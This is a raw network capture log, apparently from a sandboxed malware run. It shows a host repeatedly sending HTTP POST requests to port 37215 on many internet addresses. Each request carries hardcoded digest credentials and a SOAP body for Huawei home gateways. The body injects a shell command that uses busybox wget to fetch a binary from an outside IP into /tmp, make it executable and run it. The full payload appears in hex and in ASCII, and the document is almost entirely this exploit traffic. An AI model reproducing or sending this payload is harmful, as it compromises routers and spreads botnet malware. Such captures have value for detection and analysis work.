                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1962192.168.2.1554790122.172.43.9237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.088349104 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1963192.168.2.1540546102.136.106.20637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.088349104 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1964192.168.2.1536890186.117.206.10937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.088557005 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1965192.168.2.1555544157.178.169.20437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.088679075 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1966192.168.2.1549982186.184.53.8337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.088845015 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1967192.168.2.154502831.59.231.10937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.089500904 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1968192.168.2.1536424156.121.251.5837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.089565039 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1969192.168.2.1539522156.156.207.12837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.089611053 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1970192.168.2.1550134121.53.18.24137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.090059996 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1971192.168.2.154487841.133.165.16537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.090061903 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
